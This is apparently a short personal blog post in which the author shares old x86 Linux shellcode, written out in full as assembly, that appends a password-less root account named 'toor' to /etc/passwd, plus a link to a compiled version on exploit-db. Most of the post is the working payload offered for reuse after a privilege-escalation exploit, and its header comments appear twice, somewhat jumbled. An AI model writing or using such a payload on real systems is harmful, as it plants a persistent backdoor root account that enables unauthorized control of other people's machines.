Going through some old files, I came across some old shellcode I had written. Nothing special but a small payload to append the /etc/passwd file. To be honest its not even that great because to use it, you need an exploit that provides uid=0 such as a kernel null pointer dereference. Anyway, here is the code:
;append_passwd.asm
;Payload: Adds the string: [toor::0:0:t00r:/root:/bin/bash] to /etc/passwd thereby adding password-less root account with login name "toor"
;Platform: linux/x86
;Size: 107 bytes
;Author: $andman
;BEGIN CODE
The compiled, alphanumeric code can be taken from exploitdb:
http://www.exploit-db.com/exploits/13579/
;append_passwd.asm
;Payload: Adds the string: [toor::0:0:t00r:/root:/bin/bash] to /etc/passwd thereby adding password-less root account with login name "toor"
;Platform: linux/x86
;Size: 107 bytes
;Author: $andman
;BEGIN CODE
Section .data;CODE END
global _start
_start:
jmp short callfunc
func:
pop esi
xor eax, eax
mov byte [esi+11], al
mov byte [esi+43], al
mov byte [esi+42], 0xa
lea ebx, [esi+12]
mov long [esi+44],ebx
lea ebx,[esi]
mov cx,1090
mov dx,0x1a4
mov al,0x05
int 0x80
mov long ebx, eax
xor edx,edx
mov ecx, [esi+44]
mov dl,31
mov al,0x04
int 0x80
mov al,0x06
int 0x80
mov al,0x01
xor ebx,ebx
int 0x80
callfunc:
call func
db '/etc/passwd#toor::0:0:t00r:/root:/bin/bash #XXXX'
The compiled, alphanumeric code can be taken from exploitdb:
http://www.exploit-db.com/exploits/13579/
No comments:
Post a Comment